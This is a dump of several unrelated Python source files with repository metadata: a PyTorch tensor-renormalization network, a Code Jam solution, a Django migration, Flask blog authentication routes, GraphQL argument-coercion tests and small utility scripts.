ano = "False"
d_min = 1.5
def wrapper(function, *args):
def wrapped():
return function(*args)
return wrapped
wrapped=wrapper( looper )
print timeit.timeit(wrapped, number=1) #for 1 iteration
|
[
"web66492@i24-ws006.diamond.ac.uk"
] |
web66492@i24-ws006.diamond.ac.uk
|
52f01d36054ae48e366e154ca30c5a2e6398678b
|
acf7422d7e30b4fab49870a6db60952799edc52b
|
/network/TNRnet.py
|
ec7274cbf048ebd096db6a0801ee66f17a86b2b8
|
[
"MIT"
] |
permissive
|
sailfish009/IsoTensor
|
361832b3ccd47f2cf190c960594b6df5927284c7
|
aa797678fc16071667dd0255c42bf0b925ad09dc
|
refs/heads/master
| 2023-08-15T10:06:14.601510
| 2021-10-05T05:06:39
| 2021-10-05T05:06:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,346
|
py
|
import sys
sys.path.append("..")
import torch
from lib import functional as func
from layer import TNRlayer
class TNRNet(torch.nn.Module):
r"""A standard TNR coarse-graining network.
"""
def __init__(self, chi_HV, chi_list=(8,8,8,8), dtype=torch.double, totlv=8):
super().__init__()
self.chi_list = chi_list
self.totlv = totlv
self.chi_HV = chi_HV
self.dtype = dtype
self.layers_tnr = []
layers = [TNRlayer.LayerGen(), TNRlayer.LayerDiv()]
for i in range(totlv):
self.layers_tnr.append(TNRlayer.LayerTNR(chi_HV, chi_list, dtype))
layers.append(self.layers_tnr[-1])
layers.append(TNRlayer.LayerDiv())
_,_,_,_, chiAH, chiAV = func.get_chi(chi_HV, chi_list)
chi_HV = (chiAH, chiAV)
self.net = torch.nn.ModuleList(layers)
def forward(self, x):
for layer in self.net:
x = layer(x)
return x
def sum_lnZ(self, A_top):
r"""Compute the lnZ at the top layer.
"""
lnZ = torch.log(torch.einsum('abab', A_top))
i = 0
for lay in reversed(self.net):
if isinstance(lay, TNRlayer.LayerDiv):
lnZ += 4 ** i * torch.log(lay.norm)
i += 1
lnZ = lnZ / 4 ** (self.totlv)
return lnZ
|
[
"xwkgch@gmail.com"
] |
xwkgch@gmail.com
|
559577f8d534401d2b86283e76bc7d558264b5d0
|
da67476dcc50c8a2f55b4be3ce6db0daf6a6f86c
|
/esl/mathematics/variable.py
|
53a7e3b92ee378929a0f5d7c9c269d371736b560
|
[
"Apache-2.0"
] |
permissive
|
fagan2888/ESL
|
82a9add84023500a5d290f8f7304f9d670c0d0d9
|
24ffa903e8c5b9e725eed9861623d4b6a4a205a2
|
refs/heads/master
| 2022-04-17T12:41:22.337750
| 2020-04-16T03:24:28
| 2020-04-16T03:24:28
| 256,305,955
| 1
| 0
|
Apache-2.0
| 2020-04-16T19:08:21
| 2020-04-16T19:08:21
| null |
UTF-8
|
Python
| false
| false
| 26
|
py
|
class Variable:
pass
|
[
"scholl.maarten@gmail.com"
] |
scholl.maarten@gmail.com
|
567283eb0c088b1d94bef402441630ff0a7f61db
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_1/511.py
|
d2093e878861721d76b87fb1d507304ffdd37355
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,971
|
py
|
import os
def CommandLineOperations(argv):
"""
Main method for reading argument from command prompt,
read file with input data, process data and write result in output file
argv command prompt arguments
"""
outputFile = "result.out"
inputFile = None
scriptName = argv[0]
del argv[0]
try:
argTup = getopt.getopt(argv, "di:o:", ["dist", "input=", "output="])
try:
for opt, val in argTup[0]:
if opt in ("-d", "-dist"):
makeExe(scriptName)
sys.exit(0)
if opt in ("-i", "-input="):
inputFile = val
if opt in ("-o", "-output="):
outputFile = val
#print inputFile, outputFile
except ValueError:
raise getopt.GetoptError("ERROR: Input File is requited")
if not inputFile:
raise getopt.GetoptError("ERROR: Input File is requited")
except getopt.GetoptError:
usage()
sys.exit(2)
return (inputFile, outputFile)
def solveProblem(argv, method, linesPerCase = 1, inputFile = None, outputFile = None):
if inputFile is None and outputFile is None:
inputFile, outputFile = CommandLineOperations(argv)
inputFile = os.path.normpath(inputFile)
outputFile = os.path.normpath(outputFile)
"""
Method for solving problem.
param inputFile Filename of input file with input data
param outputFule Filename of output file to write resulting output data
"""
f = open(inputFile, "r")
fw = open(outputFile, "w")
line = f.readline()
casesNum = int(line)
for i in range(1, casesNum+1):
if i > 1:
fw.write("\n")
case = {}
for k in range(i, i+linesPerCase):
sNum = int(f.readline().replace("\n", ""))
sArr = []
for sN in range(0, sNum):
sLine = f.readline().replace("\n", "")
sArr.append(sLine)
qNum = int(f.readline().replace("\n", ""))
qArr = []
for qN in range(0, qNum):
qLine = f.readline().replace("\n", "")
qArr.append(qLine)
case = {"s":sArr, "q":qArr}
i = k
result = method(case)
fw.write("Case #%d: %s" % (i, result))
fw.close()
f.close()
def universeCaseMethodOld(caseLines):
sArr = caseLines.get("s")
qArr = caseLines.get("q")
counter = []
for s in sArr:
counter.append(qArr.count(s))
answer = min(counter)
return answer
def universeCaseMethod(caseLines):
sArr = caseLines.get("s")
qArr = caseLines.get("q")
sArrTemp = sArr
counter = 0
incDict = {}
ind = 0
for q in qArr:
if incDict.has_key(q) == False:
incDict[q] = 0
incDict[q] += 1
#print q, incDict
if len(incDict) == len(sArr):
counter += 1
incDict = {}
if ind > 1 and incDict == {} :
if qArr[ind-2] == q:
counter += 1
#print "plus one"
ind += 1
return counter
def findBestEngine(sArr, qArr, currEngine):
countDict = {}
switch = False
qArrNext = qArr
currLine = qArr[0]
if currLine == currEngine:
switch = True
#qArrNext = qArr[1:]
if switch or currEngine == None:
currEngineChanged = False
sArrLen = len(sArr)
#print sArrLen
for q in qArrNext:
countDict[q] = 1
if len(countDict) == sArrLen:
currEngine = q
currEngineChanged = True
break
if not currEngineChanged:
#print "second try"
lastItems = []
currMin = 0
for s in sArr:
currCount = qArrNext.count(s)
if currMin >= currCount:
currEngine = s
currEngineChanged = True
if currEngineChanged and currEngine == currLine:
currEngineChanged = False
#print "not good"
i = 0
for q in qArrNext:
if q == currEngine:
currEngine = qArrNext[i-1]
currEngineChanged = True
break
i += 1
if not currEngineChanged:
for q in qArr:
if q != currEngine:
currEngine = q
currEngineChanged = True
break
return currEngine, switch
def universeCaseMethodV2(caseLines):
sArr = caseLines.get("s")
qArr = caseLines.get("q")
index = 0
counter = 0
currEngine = None
for q in qArr:
currEngine, switch = findBestEngine(sArr, qArr[index:], currEngine)
#print "Line: %s, Current: %s, Switch: %s" % (q, currEngine, switch)
if switch:
counter += 1
index += 1
return counter
if __name__ == "__main__":
case1 = {"s":[ "Googol Haiti",
"Googol Montserrat",
"Googol Kazakhstan"],
"q":[ "Googol Haiti",
"Googol Montserrat",
"Googol Kazakhstan",
"Googol Haiti",
"Googol Montserrat",
"Googol Kazakhstan",
"Googol Haiti",
"Googol Montserrat",
"Googol Kazakhstan"]}
case2 = {"s":["Googol Rwanda",
"Googol San Marino"],
"q":["Googol Rwanda",
"Googol San Marino",
"Googol Rwanda",
"Googol San Marino",
"Googol Rwanda",
"Googol San Marino",
"Googol Rwanda",
"Googol San Marino"]}
case3 = {"s":["Saporo",
"Googol New Zealand",
"Googol South Africa"],
"q":["Googol New Zealand",
"Saporo",
"Googol New Zealand",
"Googol New Zealand",
"Googol New Zealand",
"Googol New Zealand",
"Googol South Africa",
"Googol South Africa",
"Googol South Africa",
"Googol South Africa",
"Saporo",
"Googol South Africa"]}
## print findBestEngine(["Googol Haiti",
## "Googol Montserrat",
## "Googol Kazakhstan"],
## [ "Googol Haiti",
## "Googol Montserrat",
## "Googol Kazakhstan",
## "Googol Haiti",
## "Googol Montserrat"][0:],
## None)
##
## print findBestEngine(["Googol Haiti",
## "Googol Montserrat",
## "Googol Kazakhstan"],
##
## [ "Googol Haiti",
## "Googol Montserrat",
## "Googol Kazakhstan",
## "Googol Haiti",
## "Googol Montserrat"][0:],
## "Googol Haiti")
#print universeCaseMethodV2(case3)
solveProblem([], universeCaseMethodV2, inputFile = "c://Other//GJC//A-large.in", outputFile = "c://Other//GJC//A-large.out")
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
99c671a7ef02afe8c18f1b85bef3164626b2ca22
|
8d5826a8d2737dab73f1113de4666ff92b9da891
|
/accounts/migrations/0010_auto_20200506_1504.py
|
6e5da8fb78af7e462e6d4370c043cba354d1b81f
|
[] |
no_license
|
ShubhamDev-AI/instagram-clone
|
972ef651cbedf1996b47f7d28aa9f6219394068d
|
09e07b0f6377b848fa75bd5dc623efa98d759559
|
refs/heads/master
| 2022-12-27T03:11:02.839995
| 2020-10-14T20:08:13
| 2020-10-14T20:08:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 423
|
py
|
# Generated by Django 3.0.6 on 2020-05-06 15:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0009_auto_20200506_1105'),
]
operations = [
migrations.AlterField(
model_name='user',
name='profile',
field=models.ImageField(blank=True, null=True, upload_to='user_profiles/'),
),
]
|
[
"michel3153@gmail.com"
] |
michel3153@gmail.com
|
33eef287fd949381adf9601eda626568e80258da
|
00b9d05d36e403aafe33becfd738bedb4e6927ae
|
/Day3/ProcessFileLogger.py
|
d332c117716da51bd887c4dc9cbc9d1297ca2218
|
[] |
no_license
|
ShahUjval/Python
|
9383b2b4f5c519096a4496db3862d1adaffc2ea2
|
e49d9f148a08b8e8bd8e5d58aa5c2b9ee1984523
|
refs/heads/master
| 2021-01-20T20:18:06.616409
| 2016-06-03T09:37:38
| 2016-06-03T09:37:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 267
|
py
|
import logging
import multiprocessing
#application wide logger important
base = logging.getLogger('a')
base.setLevel(logging.DEBUG)
fh = logging.FileHandler('a.log')
fh.setFormatter(logging.Formatter('%(asctime)s : %(name)s :%(message)s'))
#base.handlers
|
[
"shah.ujval@gmail.com"
] |
shah.ujval@gmail.com
|
f8a12215603653794aa51726f6069f9f2f908477
|
fe650dd66d75df46005d255822da7c303619ba3f
|
/backend/app.py
|
6d21f1cb1acec16e4664eb0d831b6ef20c13fb4c
|
[] |
no_license
|
Ines923/FireApp2.0
|
55e654b54c7642466b9b63e600574fd22a206d57
|
5b71a81edbaf3bbb273492705d48251f2baa64ac
|
refs/heads/main
| 2023-03-20T19:42:18.395281
| 2021-03-16T06:45:37
| 2021-03-16T06:45:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,005
|
py
|
import os
from flask import Flask
from flask_cors import CORS
from backend.controllers import *
# Register the application
app = Flask(__name__)
# TODO: Tech Debt
# - CORS Should be specified at the host level per environment, not a global free-for-all.
CORS(app)
# Register all controllers individually
app.register_blueprint(existing_requests_bp)
app.register_blueprint(new_request_bp)
app.register_blueprint(recommendation_bp)
app.register_blueprint(shift_request_bp)
app.register_blueprint(vehicle_request_bp)
app.register_blueprint(volunteer_bp)
app.register_blueprint(volunteer_all_bp)
app.register_blueprint(volunteer_availability_bp)
app.register_blueprint(volunteer_preferred_hours_bp)
app.register_blueprint(volunteer_shifts_bp)
app.register_blueprint(volunteer_status_bp)
@app.route('/')
def main():
return {
'status': 'OK',
}
if __name__ == '__main__':
import logging
logging.basicConfig(filename='error.log', level=logging.DEBUG)
app.run(host='0.0.0.0')
|
[
"michaelb@altis.com.au"
] |
michaelb@altis.com.au
|
8fa0640a76846060127216e2e48716869c809a01
|
7f1c329bde20e0ee54a014ce0abcbf2c6f68d33e
|
/Flask/Blog/user/routes.py
|
82776b92d5b3d736c0b2869b0fc4ff6370b98b84
|
[
"MIT"
] |
permissive
|
LieonShelly/PythonFun
|
9a068c18efb4c98deef2bc1e7792c4b487c22f0c
|
811760d368885109f9359c2663d8ce74886f6ad6
|
refs/heads/master
| 2020-03-30T16:54:29.799783
| 2018-12-25T09:13:53
| 2018-12-25T09:13:53
| 151,432,590
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,672
|
py
|
from flask import Flask, render_template, Response, redirect, flash, url_for, request, abort, Blueprint
from flask_login import current_user, login_user, logout_user, login_required, logout_user
from Blog.user.forms import RegistrationForm, LoginForm, UpdateAccountForm, RequestResetForm, ResetPasswordForm
from Blog.post.forms import PostForm
from Blog.user.models import User
from Blog import bcrypt, db
from Blog.post.models import Posts
import secrets
import os, json
from PIL import Image
from Blog.user.utls import save_picture, sende_email
user = Blueprint('user', __name__)
@user.route("/user/<string:username>")
def user_posts(username):
page = request.args.get('page', 1, type=int)
user = User.query.filter_by(username=username).first_or_404()
posts = Posts.query.filter_by(author=user).order_by(Posts.date_posted.desc()).paginate(page = page, per_page = 5)
return render_template('user_posts.html', posts=posts, user=user)
@user.route("/rest_password", methods=['GET', 'POST'])
def rest_request():
if current_user.is_authenticated:
return redirect(url_for('main.home'))
form = RequestResetForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
sende_email(user)
flash('An email has been sent with instructions to reset your password.', 'info')
return redirect('user.login')
return render_template('reset_request.html', title = "Reset Password", form=form)
@user.route("/rest_password/<string:token>", methods=['GET', 'POST'])
def reset_token(token):
if current_user.is_authenticated:
return redirect(url_for('main.home'))
user = User.verify_reset_token(token)
if user is None:
flash('That is an invalid or expired token', 'warning')
return redirect(url_for('reset_request'))
form = ResetPasswordForm()
if form.validate_on_submit():
hashed_passwor = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
user.password = hashed_passwor
db.session.commit()
flash('Your account has been created! You are now able to log in', 'success')
return redirect(url_for('user.login'))
return render_template('reset_token.html', title='Rest Password', form=form)
@user.route('/register', methods=["GET", 'POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('main.home'))
form = RegistrationForm()
if form.validate_on_submit():
hashed_passwor = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
user = User(username=form.username.data, email = form.email.data, password=hashed_passwor)
db.session.add(user)
db.session.commit()
flash('Your account has been created! You are now able to log in', 'success')
return redirect(url_for('user.login'))
return render_template('register.html', title="register", form=form)
@user.route('/login', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect('main.home')
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user and bcrypt.check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data)
next_page = request.args.get('next')
return redirect(next_page) if next_page else redirect(url_for('main.home'))
else:
flash('Login Unsuccessful. Please check email and password', 'danger')
return render_template('login.html', title="login", form=form)
@user.route('/logout')
def logout():
logout_user()
return redirect(url_for('main.home'))
@user.route('/account', methods=['GET', 'POST'])
@login_required
def account():
form = UpdateAccountForm()
if form.validate_on_submit():
if form.picture.data:
picture_file = save_picture(form.picture.data)
current_user.image_file = picture_file
current_user.username = form.username.data
current_user.email = form.email.data
db.session.commit()
flash('Your account has been updated!', 'success')
return redirect(url_for('user.account'))
elif request.method == 'GET':
form.username.data = current_user.username
form.email.data = current_user.email
image_file = url_for('static', filename='profile_pics/' + current_user.image_file)
return render_template('account.html',
title='account',
image_file=image_file,
form=form)
|
[
"lieoncx@gmail.com"
] |
lieoncx@gmail.com
|
2bfb230ec6c964e505ddc8777dd74a8e5934253d
|
efcd21234f3291e8fc561f49a7c88fc57a63e952
|
/tests/functional/coercers/test_coercer_list_non_null_int_field.py
|
121bc4466cfd5f6984311669f1d13c78caf1299a
|
[
"MIT"
] |
permissive
|
tartiflette/tartiflette
|
146214a43847d2f423bf74594643c1fdefc746f1
|
421c1e937f553d6a5bf2f30154022c0d77053cfb
|
refs/heads/master
| 2023-09-01T02:40:05.974025
| 2022-01-20T14:55:31
| 2022-01-20T14:55:31
| 119,035,565
| 586
| 39
|
MIT
| 2023-09-11T07:49:27
| 2018-01-26T09:56:10
|
Python
|
UTF-8
|
Python
| false
| false
| 18,253
|
py
|
import pytest
from tests.functional.coercers.common import resolve_list_field
@pytest.mark.asyncio
@pytest.mark.ttftt_engine(
name="coercion",
resolvers={"Query.listNonNullIntField": resolve_list_field},
)
@pytest.mark.parametrize(
"query,variables,expected",
[
(
"""query { listNonNullIntField }""",
None,
{"data": {"listNonNullIntField": "SUCCESS"}},
),
(
"""query { listNonNullIntField(param: null) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
"""query { listNonNullIntField(param: [null]) }""",
None,
{
"data": None,
"errors": [
{
"message": "Argument < param > of non-null type < Int! > must not be null.",
"path": ["listNonNullIntField"],
"locations": [{"line": 1, "column": 29}],
"extensions": {
"rule": "5.6.1",
"spec": "June 2018",
"details": "https://graphql.github.io/graphql-spec/June2018/#sec-Values-of-Correct-Type",
"tag": "values-of-correct-type",
},
}
],
},
),
(
"""query { listNonNullIntField(param: 10) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS-[13]"}},
),
(
"""query { listNonNullIntField(param: [10]) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS-[13]"}},
),
(
"""query { listNonNullIntField(param: [10, null]) }""",
None,
{
"data": None,
"errors": [
{
"message": "Argument < param > of non-null type < Int! > must not be null.",
"path": ["listNonNullIntField"],
"locations": [{"line": 1, "column": 29}],
"extensions": {
"rule": "5.6.1",
"spec": "June 2018",
"details": "https://graphql.github.io/graphql-spec/June2018/#sec-Values-of-Correct-Type",
"tag": "values-of-correct-type",
},
}
],
},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS"}},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
{"param": None},
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = null) { listNonNullIntField(param: $param) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
"""query ($param: [Int!] = null) { listNonNullIntField(param: $param) }""",
{"param": None},
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
"""query ($param: [Int!] = null) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = null) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = [null]) { listNonNullIntField(param: $param) }""",
None,
{
"data": None,
"errors": [
{
"message": "Variable < $param > got invalid default value < [null] >.",
"path": None,
"locations": [{"line": 1, "column": 25}],
}
],
},
),
(
"""query ($param: [Int!] = [null]) { listNonNullIntField(param: $param) }""",
{"param": None},
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
"""query ($param: [Int!] = [null]) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = [null]) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = 30) { listNonNullIntField(param: $param) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS-[33]"}},
),
(
"""query ($param: [Int!] = 30) { listNonNullIntField(param: $param) }""",
{"param": None},
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
"""query ($param: [Int!] = 30) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = 30) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = [30]) { listNonNullIntField(param: $param) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS-[33]"}},
),
(
"""query ($param: [Int!] = [30]) { listNonNullIntField(param: $param) }""",
{"param": None},
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
"""query ($param: [Int!] = [30]) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = [30]) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = [30, null]) { listNonNullIntField(param: $param) }""",
None,
{
"data": None,
"errors": [
{
"message": "Variable < $param > got invalid default value < [30, null] >.",
"path": None,
"locations": [{"line": 1, "column": 25}],
}
],
},
),
(
"""query ($param: [Int!] = [30, null]) { listNonNullIntField(param: $param) }""",
{"param": None},
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
"""query ($param: [Int!] = [30, null]) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = [30, null]) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
None,
{
"data": None,
"errors": [
{
"message": "Variable < $param > of required type < [Int!]! > was not provided.",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
{"param": None},
{
"data": None,
"errors": [
{
"message": "Variable < $param > of non-null type < [Int!]! > must not be null.",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS"}},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
{"param": None},
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
{"param": [None]},
{
"data": None,
"errors": [
{
"message": "Variable < $param > got invalid value < [None] >; Expected non-nullable type < Int! > not to be null at value[0].",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
{"param": [20, None]},
{
"data": None,
"errors": [
{
"message": "Variable < $param > got invalid value < [20, None] >; Expected non-nullable type < Int! > not to be null at value[1].",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
None,
{
"data": None,
"errors": [
{
"message": "Variable < $param > of required type < [Int!]! > was not provided.",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
{"param": None},
{
"data": None,
"errors": [
{
"message": "Variable < $param > of non-null type < [Int!]! > must not be null.",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
{"param": [None]},
{
"data": None,
"errors": [
{
"message": "Variable < $param > got invalid value < [None] >; Expected non-nullable type < Int! > not to be null at value[0].",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
{"param": [20, None]},
{
"data": None,
"errors": [
{
"message": "Variable < $param > got invalid value < [20, None] >; Expected non-nullable type < Int! > not to be null at value[1].",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($item: Int) { listNonNullIntField(param: [10, $item]) }""",
None,
{
"data": {"listNonNullIntField": None},
"errors": [
{
"message": "Argument < param > has invalid value < [10, $item] >.",
"path": ["listNonNullIntField"],
"locations": [{"line": 1, "column": 49}],
}
],
},
),
(
"""query ($item: Int) { listNonNullIntField(param: [10, $item]) }""",
{"item": None},
{
"data": {"listNonNullIntField": None},
"errors": [
{
"message": "Argument < param > has invalid value < [10, $item] >.",
"path": ["listNonNullIntField"],
"locations": [{"line": 1, "column": 49}],
}
],
},
),
(
"""query ($item: Int) { listNonNullIntField(param: [10, $item]) }""",
{"item": 20},
{"data": {"listNonNullIntField": "SUCCESS-[13-23]"}},
),
(
"""query ($item: Int = null) { listNonNullIntField(param: [10, $item]) }""",
None,
{
"data": {"listNonNullIntField": None},
"errors": [
{
"message": "Argument < param > has invalid value < [10, $item] >.",
"path": ["listNonNullIntField"],
"locations": [{"line": 1, "column": 56}],
}
],
},
),
(
"""query ($item: Int = null) { listNonNullIntField(param: [10, $item]) }""",
{"item": None},
{
"data": {"listNonNullIntField": None},
"errors": [
{
"message": "Argument < param > has invalid value < [10, $item] >.",
"path": ["listNonNullIntField"],
"locations": [{"line": 1, "column": 56}],
}
],
},
),
(
"""query ($item: Int = null) { listNonNullIntField(param: [10, $item]) }""",
{"item": 20},
{"data": {"listNonNullIntField": "SUCCESS-[13-23]"}},
),
(
"""query ($item: Int = 30) { listNonNullIntField(param: [10, $item]) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS-[13-33]"}},
),
(
"""query ($item: Int = 30) { listNonNullIntField(param: [10, $item]) }""",
{"item": None},
{
"data": {"listNonNullIntField": None},
"errors": [
{
"message": "Argument < param > has invalid value < [10, $item] >.",
"path": ["listNonNullIntField"],
"locations": [{"line": 1, "column": 54}],
}
],
},
),
(
"""query ($item: Int = 30) { listNonNullIntField(param: [10, $item]) }""",
{"item": 20},
{"data": {"listNonNullIntField": "SUCCESS-[13-23]"}},
),
(
"""query ($item: Int!) { listNonNullIntField(param: [10, $item]) }""",
None,
{
"data": None,
"errors": [
{
"message": "Variable < $item > of required type < Int! > was not provided.",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($item: Int!) { listNonNullIntField(param: [10, $item]) }""",
{"item": None},
{
"data": None,
"errors": [
{
"message": "Variable < $item > of non-null type < Int! > must not be null.",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($item: Int!) { listNonNullIntField(param: [10, $item]) }""",
{"item": 20},
{"data": {"listNonNullIntField": "SUCCESS-[13-23]"}},
),
],
)
async def test_coercion_list_non_null_int_field(
engine, query, variables, expected
):
assert await engine.execute(query, variables=variables) == expected
|
[
"raulic.maximilien@gmail.com"
] |
raulic.maximilien@gmail.com
|
5791616a8a1e7dcf5a07fcf0815db7cdc553d58f
|
5496690d32082ab03cde34f773250ea2e985389a
|
/lib/cleanup.py
|
33c2ccf6b8b73942bec8665b2dcdb8289548e48e
|
[
"MIT"
] |
permissive
|
akshayah3/retriever
|
3dbbc586ef983f47f48bde5913cd16e6c760da57
|
00bcaae301bf3636a261498f92f0b86c89232bfe
|
refs/heads/master
| 2021-01-17T21:49:22.572745
| 2015-03-11T13:00:14
| 2015-03-11T13:00:14
| 32,079,469
| 0
| 0
| null | 2015-03-12T13:50:10
| 2015-03-12T13:50:10
| null |
UTF-8
|
Python
| false
| false
| 746
|
py
|
def correct_invalid_value(value, args):
"""This cleanup function replaces null indicators with None."""
try:
if value in [item for item in args["nulls"]]:
return None
if float(value) in [float(item) for item in args["nulls"]]:
return None
return value
except:
return value
def no_cleanup(value, args):
"""Default cleanup function, returns the unchanged value."""
return value
class Cleanup:
"""This class represents a custom cleanup function and a dictionary of
arguments to be passed to that function."""
def __init__(self, function=no_cleanup, **kwargs):
self.function = function
self.args = kwargs
|
[
"ben@bendmorris.com"
] |
ben@bendmorris.com
|
9aef24d3278c40b5258428b9026a9b8bebb8da91
|
b32f7acad62ac8c7daeac729a79a25e887698fb0
|
/main.py
|
38ce077804b97c66bd110cbe4b24ed77a589fab1
|
[] |
no_license
|
gauravsuryagandh/qbox_pivot
|
173db153bf2cb5b6b3c9781ef24531ae96860f4f
|
629abeec1440200554ad00645f7b573a82e78a23
|
refs/heads/master
| 2020-03-19T01:45:02.860841
| 2018-05-31T16:55:54
| 2018-05-31T16:55:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 794
|
py
|
#!/usr/bin/python
#system wide imports
import os
import sys
#local imports
import utils
################################################################################
# Function : main()
# Main routine for the entire program. This is where the program gets started
################################################################################
def main():
print "Executing qbox with pivot based trading"
fno_list = utils.get_list_of_fno()
f_list = utils.get_last_file("bhavcopy", 1)
f_name = "bhavcopy/" + f_list[0]
fp = open(f_name)
for each in fp:
l = each.strip().split(',')
if l[1] != "EQ":
continue
if l[0] in fno_list:
print l
'''
calling main function
'''
if __name__ == "__main__":
main()
|
[
"gaurav.suryagandh@gmail.com"
] |
gaurav.suryagandh@gmail.com
|
db5bb3b990389bd21500fc823b8084ab408db73d
|
65311c6b01fe056021b815f62f3723f5b52a3251
|
/realestate/spiders/vandewater.py
|
